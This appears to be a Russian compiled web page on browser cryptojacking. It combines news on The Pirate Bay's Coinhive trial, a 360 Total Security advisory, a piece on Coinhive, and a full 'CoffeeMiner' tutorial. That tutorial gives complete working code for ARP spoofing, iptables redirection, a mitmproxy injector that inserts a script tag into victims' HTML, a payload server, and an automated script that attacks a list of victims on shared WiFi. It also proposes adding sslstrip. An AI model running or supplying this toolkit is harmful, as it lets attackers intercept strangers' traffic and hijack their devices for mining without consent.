CoffeeMiner: Взлом WiFi для внедрения майнера криптовалюты Monero в сайты. Криптовалюты script


Майнить криптовалюту можно прямо через браузеры пользователей. Это уже делают Pirate Bay и хакеры

В минувшую субботу, 16 сентября 2017 года, пользователи одного из крупнейших торрент-трекеров сети, «непотопляемого» The Pirate Bay, обратили внимание, что при посещении некоторых страниц сайта нагрузка на процессор резко возрастает. Как выяснилось, причиной тому стал криптовалютный майнер, который встроили прямо в код сайта при помощи JavaScript.

При ближайшем рассмотрении оказалось, что майнер предоставлен сервисом Coinhive, который предлагает владельцам сайтов конвертировать мощности CPU посетителей в криптовалюту Monero. При этом майнер работал не на всех страницах ресурса. Журналисты Torrent Freak сообщают, что функцию активировали для страницы с результатами поиска и на страницах категорий, на главной странице сайта, а также страницах отдельных раздач майнер не работал.

Представители ресурса подтвердили Torrent Freak, что трекер не взломали. Администрация проводила кратковременные испытания (майнер проработал около 24 часов) новой модели монетизации.  По словам операторов The Pirate Bay, в будущем встроенный манер, вероятно, сможет полностью заменить собой обычную рекламу.

Блокировать такой майнер можно отключением Javascript, установкой соответственных расширений для браузера (к примеру, NoScript и ScriptBlock), а также через блокировщик рекламы, добавив URL в черный список (не самый надежный вариант, ведь адрес может меняться).

Проделать эти операции будет совсем не лишним, так как подобный способ монетизации за последнее время успел опробовать не только The Pirate Bay. В конце прошлой недели специалисты компании ESET зафиксировали ряд очень похожих кампаний: на страницах российских и украинских сайтов появилась вредоносная реклама, в тайне от пользователей использующая их браузеры для майнинга. На графиках ниже можно увидеть распределение кампаний по странам и конкретным сайтам.

В этом случае злоумышленники тоже используют JavaScript и модифицированную версию майнера MineCrunch, также известного как Web Miner. Этот скрипт был создан еще в 2014 году, специально для майнинга криптовалют через браузеры.

Так как работа майнера значительно влияет на производительность устройства, и не заметить происходящее сложно, майнинговую рекламу стараются внедрять на сайты с потоковым видео или браузерными играми. Такие ресурсы сами по себе заметно нагружают систему и потребляют ресурсы, так что пользователь может не заметить работающий на фоне манер. Более того, на таких сайтах пользователи проводят много времени, что сулит операторам адвари бОльшие прибыли.

Как работает эта схема

Аналитики ESET пишут, что им удалось обнаружить скрипты для майнинга Monero, Feathercoin и Litecoin, но Monero в настоящий момент является главным приоритетом для злоумышленников. Так, конфигурация Litecoin-майнера пуста, а в случае Feathercoin все настройки остались дефолтными, даже адрес в точности повторяет демонстрационную страницу с GitHub.

Также исследователи заметили похожую кампанию, но направленную на майнинг Zcash, которой, судя по всему, управляет другая хакерская группа. В этом случае для «доставки» майнера не используется вредоносная реклама, но JavaScript-код внедряется непосредственно на сами сайты (точно так же, как в случае The Pirate Bay).

Стоит сказать, что сами по себе майнеры для браузеров – не такое уж новое явление. К примеру, предлагающий такие услуги сервис Bitp.it появился еще в 2011 году, но в итоге был закрыт. Также в 2015 году генеральная прокуратура штата Нью-Джерси закрыла аналогичный ресурс Tidbit, предлагавший владельцам сайтов майнер, который будет эксплуатировать компьютеры посетителей. Тогда власти сочли такую деятельность нелегальной, сродни хакингу, ведь Tidbit не уведомлял пользователей о происходящем и не спрашивал их разрешения.

xakep.ru

Взлом WiFi для внедрения майнера криптовалюты Monero в сайты

Внимание: эта статья и проект предназначены исключительно для изучения. Все тесты были сделаны на собственных компьютерах на своей личной WIFI сети.

Несколько недель назад я прочел этот Starbucks кейс , где хакеры взломали ноутбуки через WiFi сеть для использования мощностей компьютеров для майнинга криптовалюты Monero, и мне стало любопытно: как можно сделать похожую атаку, но другим путем.

Суть данной статьи в том, чтобы объяснить, как провести атаку MITM (Man-In-The-Middle), чтобы заразить несколько javascript кода в HTML страницах для того, чтобы использовать все устройства, подключенные к сети WiFi для майнинга криптовалюты.

Цель заключается в том, чтобы получить скрипт, который выполняет автоматическую атаку на сеть WiFi. Это и есть CoffeeMiner, так как такой тип атаки может быть выполнен в кафе, где есть WiFi.

Сценарий

Нужны несколько компьютеров, подключенных к сети WiFi, где CoffeeMiner перехватывает трафик между пользователем и роутером.

Настройки

Настоящий сценарий – это WiFi с подключенными к нему смартфонами и ноутбуками. Мы попробовали его в реальности, и все сработало. Но для данной статьи, мы рассмотрим детальнее, как настроить виртуальное пространство.

Мы используем VirtualBox, чтобы развернуть наш виртуальный сценарий https://www.virtualbox.org/ .

Для начала, нам нужно скачать образ для Linux и установить его в VirtualBox. Для нашего примера воспользуемся Kali https://www.kali.org/

После того как мы загрузили ISO, подготовим три VBox-а с установленным ISO.

Для настройки определенного сценария, нам нужно подготовить каждый VBox для своей роли:

  • Жертва — Компьютер, подключенный к роутеру, на котором просматривают какие-либо сайты в интернете
  • Хакер — Компьютер, на котором запущен CoffeeMiner. Компьютер, выполняющий MITM.
  • Router — Обычный шлюз

 

 

Когда атака выполнена, сценарий должен быть таким:

 

 

Чтобы выполнить настройку, необходимо провести следующее на виртуальных машинах:

Компьютер жертвы 

  • network adapter:eth0: Host-only Adapter

 

Файл: /etc/network/interfaces:

auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.2.10 netmask 255.255.255.0 gateway 10.0.2.15

auto lo

iface lo inet loopback

 

auto eth0

iface eth0 inet static

    address 10.0.2.10

    netmask 255.255.255.0

    gateway 10.0.2.15

Компьютер хакера:

  • network adapter:eth0: Host-only Adapter

Файл: /etc/network/interfaces:

auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.2.20 netmask 255.255.255.0 gateway 10.0.2.15

auto lo

iface lo inet loopback

 

auto eth0

iface eth0 inet static

    address 10.0.2.20

    netmask 255.255.255.0

    gateway 10.0.2.15

Router:

  • network adapter:eth0: Bridged Adaptereth2: Host-only Adapter

Файл: /etc/network/interfaces:

auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth2 iface eth2 inet static address 10.0.2.15 netmask 255.255.255.0

auto lo

iface lo inet loopback

 

auto eth0

iface eth0 inet dhcp

 

auto eth2

iface eth2 inet static

    address 10.0.2.15

    netmask 255.255.255.0

2. CoffeeMiner, понимание кода

2.1 ARPspoofing

Для начала, нам нужно разобраться, как проводить MITM атаку.

Из википедии:

«В компьютерной сети, ARP-спуфинг, отравление кэша ARP или маршрутизация ARP-яда, это техника, когда атака выполняется отправкой ARP (Address Resolution Protocol) сообщений в локальную сеть. Цель заключается в том, чтобы связать МАС адрес атакующего с IP адресом другого хоста, например, шлюз по умолчанию. Таким образом, любой трафик, направленный на определенный IP адрес отправляется атакующему.

https://en.wikipedia.org/wiki/ARP_spoofing

Чтобы совершить ARP-спуфинг, нам нужно использовать библиотеку dsniff.

arpspoof -i interface -t ipVictim ipGateway arpspoof -i interface -t ipGateway ipVictim

arpspoof -i interface -t ipVictim ipGateway

arpspoof -i interface -t ipGateway ipVictim

2.2 mitmproxy

mitmproxy – это инструмент, который позволяет нам анализировать трафик, идущий через хоста, и дает возможность менять этот трафик. В нашем случае, мы используем его для заражения javascript в HTML страницах. Чтобы сделать дело чисто, мы внедрим только одну строку кода в страницах HTML. Это будет строка кода, которая вызывает майнер криптовалюты в javascript.

Строка, внедряющая майнер:

<script src="http://httpserverIP:8000/script.js"></script>

<script src="http://httpserverIP:8000/script.js"></script>

2.3 Внедрение кода

После перехвата трафика жертвы, нам нужно ввести наш скрипт. Для этого нам понадобится API mitmproxy:

from bs4 import BeautifulSoup from mitmproxy import ctx, http import argparse class Injector: def __init__(self, path): self.path = path def response(self, flow: http.HTTPFlow) -> None: if self.path: html = BeautifulSoup(flow.response.content, "html.parser") print(self.path) print(flow.response.headers["content-type"]) if flow.response.headers["content-type"] == 'text/html': script = html.new_tag( "script", src=self.path, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html).encode("utf8") print("Script injected.") def start(): parser = argparse.ArgumentParser() parser.add_argument("path", type=str) args = parser.parse_args() return Injector(args.path)

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

from bs4 import BeautifulSoup

from mitmproxy import ctx, http

import argparse

 

class Injector:

    def __init__(self, path):

        self.path = path

 

    def response(self, flow: http.HTTPFlow) -> None:

        if self.path:

            html = BeautifulSoup(flow.response.content, "html.parser")

            print(self.path)

            print(flow.response.headers["content-type"])

            if flow.response.headers["content-type"] == 'text/html':

                script = html.new_tag(

                    "script",

                    src=self.path,

                    type='application/javascript')

                html.body.insert(0, script)

                flow.response.content = str(html).encode("utf8")

                print("Script injected.")

 

def start():

    parser = argparse.ArgumentParser()

    parser.add_argument("path", type=str)

    args = parser.parse_args()

    return Injector(args.path)

2.4 HTTP Сервер

Как мы видим, инъектор добавляет строку в html и вызывает наш крипто-майнер. Теперь нам нужно развернуть скрипт файл в НТТР сервере. Для поддержки криптовалютного майнера, мы развернем НТТР сервер в компьютере атакующего. Чтобы сделать это, воспользуемся библиотекой Python ‘http.server’:

#!/usr/bin/env python import http.server import socketserver import os PORT = 8000 web_dir = os.path.join(os.path.dirname(__file__), 'miner_script') os.chdir(web_dir) Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("", PORT), Handler) print("serving at port", PORT) httpd.serve_forever()

#!/usr/bin/env python

import http.server

import socketserver

import os

 

PORT = 8000

 

web_dir = os.path.join(os.path.dirname(__file__), 'miner_script')

os.chdir(web_dir)

 

Handler = http.server.SimpleHTTPRequestHandler

httpd = socketserver.TCPServer(("", PORT), Handler)

print("serving at port", PORT)

httpd.serve_forever()

Код выше – это простой НТТР сервер, который внесет наш крипто-майнер жертвам, когда они выполнят запрос.

Javascript майнер будет расположен в папке /miner_script. В нашем случае используется javascript майнер CoinHive.

2.5 Крипто майнер CoinHive

CoinHive – это javascript майнер криптовалюты (XMR) Monero. Его можно добавить в сайт, чтобы он использовал мощность компьютера для подсчета хешей с алгоритмом хешей Cryptonight PoW для майнинга Monero, который строится на протоколе CryptoNote. Использование данного майнера имеет смысл, если пользователь остается на сайте подольше. Так что, для вебсайта, где средняя продолжительность сессии ~40 секунд, использование CoinHive – не очень разумно.

В нашем случае, так как мы введем крипто майнер в каждую HTML страницу, которую запрашивает жертва, мы получаем длительные сессии с подсчетом кешей для майнинга Monero.

3. CoffeeMiner: соединяем все воедино

Теперь наша главная задача – связать все в автоматический процесс. Это и будет CoffeeMiner. Суть в том, чтобы получить скрипт CoffeeMiner, проводящий ARP-спуфинг атаку и настраивает mitmproxy на внедрение криптовалютного майнера CoinHive в HTML страницы жертвы.

Вопервых, нам нужно настроить ip_forwarding и IPTABLES, чтобы конвертировать компьютер атакующего (хакера) в прокси:

echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Для выполнения ARP-спуфа для всех жертв, нам нужно приготовить файл ‘victims.txt’, с IP адресами всех жертв. Чтобы прочитать IP всех жертв, нам нужно несколько строк в Python, которые должны будут получить IP адреса (а также IP шлюза из командной строки args), и применить ARP-спуфинг для IP каждой жертвы.

# получаем gateway_ip gateway = sys.argv[1] print("gateway: " + gateway) # Получаем IP жертв victims = [line.rstrip('\n') for line in open("victims.txt")] print("victims:") print(victims) # запускаем arpspoof для каждой жертвы, где каждый – новая консоль for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")

# получаем gateway_ip

gateway = sys.argv[1]

print("gateway: " + gateway)

# Получаем IP жертв

victims = [line.rstrip('\n') for line in open("victims.txt")]

print("victims:")

print(victims)

 

# запускаем arpspoof для каждой жертвы, где каждый – новая консоль

for victim in victims:

    os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")

    os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")

После выполнения ARP-спуфинга, нам всего лишь нужно запустить НТТР сервер:

Теперь мы можем запустить mitmproxy с injector.py:

> mitmdump -s 'injector.py http://httpserverIP:8000/script.js'

> mitmdump -s 'injector.py http://httpserverIP:8000/script.js'

3.1 CoffeeMiner, последний скрипт

Теперь мы соединяем все вышеописанное в скрипте ‘coffeeMiner.py’

import os import sys # Получаем IP роутера gateway = sys.argv[1] print("gateway: " + gateway) # Получаем IP жертв victims = [line.rstrip('\n') for line in open("victims.txt")] print("victims:") print(victims) # настраиваем роутинг (IPTABLES) os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE") os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080") os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080") # запускаем arpspoof для каждой жертвы, каждый – в новой консоли for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # запускаем НТТР сервер для поддержки script.js в новой консоли os.system("xterm -hold -e 'python3 httpServer.py' &") # запускаем mitmproxy os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

import os

import sys

 

# Получаем IP роутера

gateway = sys.argv[1]

print("gateway: " + gateway)

 

# Получаем IP жертв

victims = [line.rstrip('\n') for line in open("victims.txt")]

print("victims:")

print(victims)

 

# настраиваем роутинг (IPTABLES)

os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")

os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")

os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")

os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")

 

 

# запускаем arpspoof для каждой жертвы, каждый – в новой консоли

for victim in victims:

    os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")

    os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")

 

# запускаем НТТР сервер для поддержки script.js в новой консоли

os.system("xterm -hold -e 'python3 httpServer.py' &")

 

# запускаем mitmproxy

os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")

 

 

То же самое в скрипте ‘injector.py’:

from bs4 import BeautifulSoup from mitmproxy import ctx, http import argparse class Injector: def __init__(self, path): self.path = path def response(self, flow: http.HTTPFlow) -> None: if self.path: html = BeautifulSoup(flow.response.content, "html.parser") print(self.path) print(flow.response.headers["content-type"]) if flow.response.headers["content-type"] == 'text/html': print(flow.response.headers["content-type"]) script = html.new_tag( "script", src=self.path, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html).encode("utf8") print("Script injected.") def start(): parser = argparse.ArgumentParser() parser.add_argument("path", type=str) args = parser.parse_args() return Injector(args.path)

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

from bs4 import BeautifulSoup

from mitmproxy import ctx, http

import argparse

 

class Injector:

    def __init__(self, path):

        self.path = path

 

    def response(self, flow: http.HTTPFlow) -> None:

        if self.path:

            html = BeautifulSoup(flow.response.content, "html.parser")

            print(self.path)

            print(flow.response.headers["content-type"])

            if flow.response.headers["content-type"] == 'text/html':

                print(flow.response.headers["content-type"])

                script = html.new_tag(

                    "script",

                    src=self.path,

                    type='application/javascript')

                html.body.insert(0, script)

                flow.response.content = str(html).encode("utf8")

                print("Script injected.")

 

def start():

    parser = argparse.ArgumentParser()

    parser.add_argument("path", type=str)

    args = parser.parse_args()

    return Injector(args.path)

Для выполнения нам нужно ввести:

> python3 coffeeMiner.py RouterIP

> python3 coffeeMiner.py RouterIP

4. Демо

Чтобы создать demo, нам нужно настроить сценарий VirtualBox, который упоминался ранее. Если мы хотим провести атаку вручную, нам понадобятся следующие терминалы:

Далее, когда ARP-спуф атака проведена, injector и НТТР сервер готовы, мы можем перейти к компьютеру жертвы и зайти на сайт. Трафик жертвы будет проходить через компьютер атакующего, и активирует injector:

В результате, html страницы, просматриваемые жертвой, будут содержать html строки кода, внедренные хакером.

Демо видео

В следующих видео, мы можем увидеть весь процесс с использованием скрипта coffeeMiner.py:

VirtualBox демо

Реальный WiFi и ноутбуки

Как мы видим, такую атаку достаточно легко выполнить. Кроме этого, процесс можно сделать автоматическим для конкретной WiFi сети. Есть еще один момент, о котором стоит подумать: в случае с реальной WiFi сетью, лучше проводить операцию, когда есть мощная WiFi антенна, чтобы лучше охватить всю зону. Суть в том, чтобы провести автономную атаку, но нам все еще нужно править файл victims.txt с IP адресами жертв. Для будущей версии можно будет добавить сканер nmap, чтобы добавить IP адреса, обнаруженные в списке жертв CoffeeMiner. Еще одна дополнительная функция, которая может сделать операцию более эффективной, это добавить sslstrip, чтобы убедиться в том, что внедрение прошло и на те сайты, которые пользователь может запросить через HTTPS.

python-scripts.com

Скрытый майнинг-скрипт майняет криптовалюты через браузеры .

26 Сен. 2017 г.kate

Подробнее о 360 Total Security

170926_blog_Mining

В последние дни центр 360 безопасности обнаружил новый тип кибератак.Скрытый майнинг-скрипт по виду скрипта JavaScript существует на странице и майняет криптовалюты в чужой кошелек.Речь идет о веб-майнере под названием JS/CoinMiner. Данный скрипт встроен на веб-сайте, называемом “Intranet Agent System of Wanfang Science and Technology College.Одновремено мы также отслеживаем, что на некоторых иностранных сайтах тоже включен похожий майнинг-скрипт :

挖矿脚本内图 1-RU

Согласно нашим данным мониторинга,этот майнинг-скрипт только появился от 15 сентября и распространен с высокой скоростью, уровень трафика достиг 100 000+ в течении неледли. А также ситуация действительно продолжает развиваться.

挖矿脚本内图 2-RU

Согласно статистике от иностранные СМИ, две третьих (65,29%) данной кибератаки из-за майнинг-скрипта JS/CoinMiner приходятся на Россию, 21,95% на Украину и 6,49% на Беларусь.Чтобы защитить больше пользователей от атак,центр 360 безопасности провел углубленный анализ к принципу работы данного майнинг-скрипта и предложила эффективное решение.

Как и где могут скрываться майнеры?

Изучая исходный код сайта, мы можем легко найти код-Coinhive JavaScript Miner, встроен на странице.Данный код написан на основе майнинг-алгоритме CryptoNight,который может майнить такие криптовалюты, как Monero, Dashcoin, DarkNetCoin и тд.

Обычно майнинг-скрипт скрывается на таких потециальных опасных сайтах-страницы с рекламными баннерами или потоковым видео или браузерными играми, где посетители проводят больше времени. К тому же подобные ресурсы сами по себе нагружают процессор, что маскирует повышенную нагрузку от скрытого майнинг-скрипта.

Как работает майнинг-скрипт через браузер?

Работа майнинг-скрипта начинается, как только вы открываете страницу с майнинг-скриптом через браузер и в этом браузере JavaScript включен по умолчанию. В процессе жертве даже не нужно устанавливать никакие вредоносные ПО. Но в это время ваш компьютер тормозит и майнинг-скрипт помогает преступникам капавать криптовалюты на кошельки.Такое действие займет много CPU, и даже может привести к тому, что ваш компьютер не может нормально работать.

Как защитить ваш компьютер от кибератак из-за майнинг-скрипта?

Использоваине встроенного майнинг-скрипта на сайте для заработы денег становится непреодолимым трендом.Это действие обязано позволить преступников следовать и привести к больше кибератакам в будущем.Чтобы защитить больше пользователей от атак из-за майнинг-скрипта,мы будем продолжать поддерживать мониторинг и блокировку этого тип кибератак и выносить следующие рекомендации:

— Отключить JavaScript ,чтобы обезопасить себя от тайного майнинг-скрипта,однако это способ создаст некоторые ограничения в использовании легитимных сайтов.

— Установить блокировшик реклам. (Попробуйте браузер Opera,автомотически блокирировать рекламу.)

— Обновить 360Total Security до последней версии, всроенный инструмент помогает вам блокировать кибератаки из-за майнинг-скрипта в реальном времени.

Подробнее о 360 Total Security

blog.360totalsecurity.com

Скрипт для браузерного майнинга криптовалюты Монеро

В последнее время внимание общественности привлекает сервис, который, как выяснилось, используется на торрент-трекере Pirate Bay для майнинга Monero (XMR). Речь идёт о Coin Hive. Он позволяет пользователям встраивать JavaScript-майнеры в свои сайты и получать благодаря этому дополнительный доход. Таким образом, сам по себе сервис хорош и полезен. Проблема с Pirate Bay — в том, что этот он запускает майнер, не ставя об этом в известность посетителей: последние, открывая сайт, с удивлением замечают, что нагрузка на их процессоры значительно увеличивается. Конечно, это нехорошо.

Главная проблема в случае этого и аналогичных сервисов состоит в том, что использование вычислительных мощностей компьютеров происходит без ведома их владельцев. Необходимо ставить их в известность и предоставлять им возможность выбора.

Coin Hive не позволяет пользователям с помощью визуального интерфейса или как-то иначе узнавать о присутствии майнера. Ситуацию могла бы исправить ссылка, позволяющая открывать страницу с майнером и контролировать его работу. В таком случае у пользователя была бы возможность поддерживать своей вычислительной мощностью сайт или сообщество, к которому он принадлежит.

Это интересная идея, способная принести пользу, но беда в том, что многие предпочтут злоупотреблять сервисом, наживаясь за счёт других. Однако, если вы находите этот проект полезным, советуем вам поинтересоваться деталями. Главное, не забывайте сообщать посетителям вашего сайта о том, что ведётся майнинг.

Наряду со встроенным майнером, использующим JavaScript, сервис CoinHive предлагает альтернативы более традиционным сервисам, таким как сокращение ссылок Proof-of -Work и капча Proof-of-Work. Оба сначала осуществляют майнинг определённого числа хешей и только затем предоставляют соответствующую ссылку или просят подтвердить, что вы человек, а не бот.

Применение алгоритма Proof-of-Work для решения этих и других задач, к которым обычно подходят иначе, может одновременно повысить эффективностью уже работающих ресурсов и помочь в их монетизации. Например, с помощью криптовалютного майнинга можно награждать пользователей за выполнение тех или иных задач в процессе сетевых игр или в социальной сети.

Конечно, майнинг посредством браузера с JavaScript не столь эффективен, как майнинг с применением оптимизированного ПО. Мы экспериментировали с майнером и сервисами на основе Proof-of-Work, однако заметьте, что мы не встраивали их в сайт и не станем этого делать, не известив вас (если решим протестировать их в интерактивном режиме).

По материалам сайта Crypto Mining Blog

coinspot.io


Смотрите также